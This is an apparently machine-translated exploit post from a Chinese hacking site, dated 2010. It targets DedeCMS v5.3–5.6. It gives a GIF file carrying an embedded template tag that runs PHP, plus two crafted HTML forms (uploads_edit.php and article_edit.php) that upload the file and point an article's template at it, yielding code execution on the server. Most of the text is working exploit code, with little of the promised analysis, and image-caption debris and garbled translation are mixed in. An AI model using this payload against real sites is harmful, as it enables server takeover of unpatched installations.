dedecms v5. 3-v5. 6 Get Shell 0day exploit analysis-exploit warning-the black bar safety net

2010-09-18T00:00:00
ID MYHACK58:62201027891
Type myhack58
Reporter 佚名
Modified 2010-09-18T00:00:00

Description

author:toby57 team:www.wolvez.org

This 0day has already appeared quite a long time, today with dragons students provide the log to see the code, understand the vulnerability causes. Most of the students of Genesis is not interested, it's only published use of the method.

Gif89a{dede:field name='toby57' runphp='yes'} phpinfo(); {/dede:field} 保存 为 1.gif

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> <input type="hidden" name="aid" value="7" /> <input type="hidden" name="mediatype" value="1" /> <input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> <input type="hidden" name="dopost" value="save" /> <input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> <input name="addonfile" type="file" id="addonfile"/> <button class="button2" type="submit" >change</button> </form> Constructed as above form, 上传后图片保存为/uploads/userup/3/1.gif ! Size: 142.88 K Size: 5 0 0 x 2 3 8 Browse: 2 0 Click to open a new window to browse the full map

Published articles, and then construct a modified form as follows: <form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> <input type="hidden" name="dopost" value="save" /> <input type="hidden" name="aid" value="2" /> <input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> <input type="hidden" name="channelid" value="1" /> <input type="hidden" name="oldlitpic" value="" /> <input type="hidden" name="sortrank" value="1 2 8 2 0 4 9 1 5 0" /> <input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="1 0 0" class="intxt"/> <input type="text" name="writer" id="writer" value="1 2 3 4 5 6" maxlength="1 0 0" class="intxt" style="width:219px"/> <select name='typeid' size='1'> <option value='1' class='option3' selected=">Test</option> <select name='mtypesid' size='1'> <option value='0' selected>please select a category...</option> <option value='1' class='option3' selected>aa</option></select> <textarea name="description" id="description">aaaaaaaaaaaaa</textarea> <input type='hidden' name='dede_addonfields' value="templet"> <input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> <input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> <button class="button2" type="submit">submit</button> ! Size: 122.65 K Size: 5 0 0 x 2 3 8 Browse: 1 4 times Click to open a new window to browse the full map! Size: 94.32 K Size: 5 0 0 x 2 3 8 Browse: 1, 5 times Click to open a new window to browse the full map! Size: 153.11 K Size: 5 0 0 x 2 3 8 Browse: 1 9 times Click to open a new window to browse the full map

The Red part is the need to pay attention to the place, according to the actual situation of the corresponding modification. Modifications after completion of the review articles.